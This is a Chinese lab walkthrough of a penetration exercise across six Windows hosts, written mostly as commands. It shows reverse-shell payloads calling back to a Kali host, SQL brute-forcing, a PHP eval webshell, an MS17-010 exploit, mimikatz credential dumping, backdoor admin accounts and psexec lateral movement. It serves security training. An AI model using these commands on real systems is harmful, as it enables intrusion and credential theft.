僅作為實(shí)驗(yàn)參考，不屬于任何技術(shù)文章

本文已首發(fā)于i春秋

實(shí)驗(yàn)?zāi)康模耗孟乱惶?hào)機(jī)shell開(kāi)3389遠(yuǎn)程登錄

拓?fù)鋱D

A組

1號(hào)
賬號(hào)：Administrator
密碼：Jack@!@#

ip：192.168.141.111

2號(hào)
賬號(hào)：ADMIN-PC/ADMIN
密碼：123456hhhh.

222.18.158.244:7771

ip：192.168.141.138

3號(hào)
域名：hiro.com

管理員
賬號(hào)：hiro\administrator
密碼：hb123456,./$

域用戶(hù)
賬號(hào)：hiro.com/user1
密碼：hb123456,./$

ip：192.168.141.100

Tips
里面設(shè)了靜態(tài)ip 要改一下
已將加入過(guò)程總結(jié)

4號(hào)
賬號(hào):administrator
密碼:Win@2003

ip：192.168.141.114

5號(hào)
賬號(hào)：Administrator
密碼：Win@2008

ip：192.168.141.115

6號(hào)
賬號(hào)：Administrator
密碼：Edvison233!

ip：192.168.141.116

B組(攻擊組)

使用kali拿下二號(hào)機(jī)

通過(guò)MobaXterm連接Kali Linux(ip:192.168.141.143)，用戶(hù)名:root，密碼:toor

使用下述命令，執(zhí)行，生成木馬文件:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.141.143 LPORT=4444 -f exe > ./test.exe

生成了test.exe之后，然后在kali里，設(shè)定端口監(jiān)聽(tīng)，等待目標(biāo)上線(xiàn)

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp;show options; set LHOST 192.168.141.143;set LPORT 4444; run"

在2號(hào)機(jī)上右擊，以管理員權(quán)限執(zhí)行。kali就可以接收到反彈回來(lái)的shell。對(duì)shell進(jìn)行操作。

在kali里接收到了shell，可在meterpreter中管理shell，開(kāi)啟3389

在kali里接收到了shell，可在meterpreter中管理shell，開(kāi)啟3389

run post/windows/manage/enable_rdp

添加用戶(hù)

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

然后在服務(wù)器主機(jī)中，用新添加的賬號(hào)，遠(yuǎn)程桌面連接2號(hào)機(jī)，至此完成了對(duì)2號(hào)機(jī)的控制

2號(hào)機(jī)到6號(hào)機(jī)

使用nmap掃描發(fā)現(xiàn)192.168.141.116開(kāi)了1433端口

nmap -p1433 --open 192.168.141.0/24

使用ms-sql-brute模塊對(duì)6號(hào)機(jī)sa賬戶(hù)進(jìn)行爆破，獲得用戶(hù)名為sa，密碼為123456

nmap -p 1433 --script ms-sql-brute --script-args userdb=C:\Users\Waldo1111test\Desktop\name.txt,passdb=C:\Users\Waldo1111test\Desktop\password.txt 192.168.141.116

使用sqltools獲取6號(hào)機(jī)數(shù)據(jù)庫(kù)

用xp_cmdshell關(guān)閉防火墻限制

netsh firewall set opmode mode=disable

添加3389入站規(guī)則

netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

創(chuàng)建管理員用戶(hù)Waldo6TEST

net user Waldo6TEST 1234567hhhh. /add
net localgroup administrators Waldo6TEST /add

使用用戶(hù)名Wado6TEST 密碼1234567hhhh.成功登陸六號(hào)機(jī)

6號(hào)機(jī)到5號(hào)機(jī)

發(fā)現(xiàn)5號(hào)機(jī)開(kāi)放80端口

輸入://192.168.141.115/phpmyadmin/，弱口令 用戶(hù)名root 密碼root

嘗試寫(xiě)入webshell

use mysql;
CREATE TABLE `mysql`.`d0g3` (`sn00py` TEXT NOT NULL );
INSERT INTO `mysql`.`d0g3` (`sn00py`)VALUES ('<?php @eval($_POST[c]);?>');
SELECT sn00py FROM d0g3 INTO OUTFILE 'C:/pentest/phpstudy/WWW/shell.php';

Shell寫(xiě)到了：http://192.168.141.115/shell.php

使用菜刀連接

執(zhí)行命令whoami，發(fā)現(xiàn)是administrator權(quán)限

image

加管理員用戶(hù)

net user Waldo 1234567hhhh. /add
net localgroup administrators Waldo /add

打開(kāi)5號(hào)機(jī)3389端口:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

連接到遠(yuǎn)程桌面

5號(hào)機(jī)到4號(hào)機(jī)

在5號(hào)機(jī)上傳ms17010攻擊腳本，用kali攻擊機(jī)生成一個(gè)payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.141.143 lport=6666 -f exe -o shell.exe

開(kāi)啟msf監(jiān)聽(tīng)

msfconsole -q
use exploit/multi/handler
set lhost 0.0.0.0
set lport 6666
exploit

在5號(hào)機(jī)中cmd中C:\Users\Waldo\MS17-010-master

在5號(hào)機(jī)上，運(yùn)行ms170101攻擊腳本(腳本要自己下載)

python zzz_exploit.py 192.168.141.114

在kali里接收到了shell，可在meterpreter中管理shell，開(kāi)啟3389

run post/windows/manage/enable_rdp

添加用戶(hù)

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

在5號(hào)機(jī)遠(yuǎn)程登錄4號(hào)機(jī)

4號(hào)機(jī)到3號(hào)機(jī)

在4號(hào)機(jī)中抓取hash

privilege::debug
sekurlsa::logonpasswords

抓到域控管理員賬號(hào)和密碼:

在4號(hào)機(jī)上，使用以下命令建立IPC$連接

net use \\192.168.141.100 "hb123456,./$" /user:"Administrator"

在4號(hào)機(jī)上，使用以下命令，將目標(biāo)靶機(jī)的C盤(pán)映射到本地Z盤(pán)

net use z: \\192.168.141.100\c$

使用copy命令將先前生成的shell.exe拷貝至靶機(jī)C盤(pán)

copy shell.exe \\192.168.141.100\c$

在kali上開(kāi)啟監(jiān)聽(tīng)(6666端口)，使用psesec.exe.啟動(dòng)靶機(jī)上的shell.exe

psexec.exe \\192.168.141.100 -u administrator -p hb123456,./$ c:\\shell.exe

成功反彈shell上線(xiàn):

在kali里接收到了shell，可在meterpreter中管理shell，開(kāi)啟3389

run post/windows/manage/enable_rdp

添加用戶(hù)

run post/windows/manage/enable_rdp username="Waldo1111test" password="123456hhhh."

在4號(hào)機(jī)遠(yuǎn)程登錄3號(hào)機(jī)
用戶(hù)名:hiro\Administrator 密碼:hb123456,./$

3號(hào)機(jī)到1號(hào)機(jī)

在3號(hào)機(jī)上，使用以下命令建立IPC$連接

net use \\192.168.141.111 "hb123456,./$" /user:"Administrator"

在3號(hào)機(jī)上，使用以下命令，將目標(biāo)靶機(jī)的C盤(pán)映射到本地Z盤(pán)

net use z: \\192.168.141.111\c$

使用copy命令將先前生成的shell.exe拷貝至靶機(jī)C盤(pán)

copy shell.exe \\192.168.141.111\c$

在kali上開(kāi)啟監(jiān)聽(tīng)(6666端口)，使用psexec.exe.啟動(dòng)靶機(jī)上的shell.exe

psexec.exe \\192.168.141.111 -u hiro\Administrator -p hb123456,./$ c:\\shell.exe

成功獲取shell

打開(kāi)一號(hào)機(jī)3389

使用用戶(hù)名:hiro\Administrator 密碼: hb123456,./$登錄

成功拿下一號(hào)機(jī)！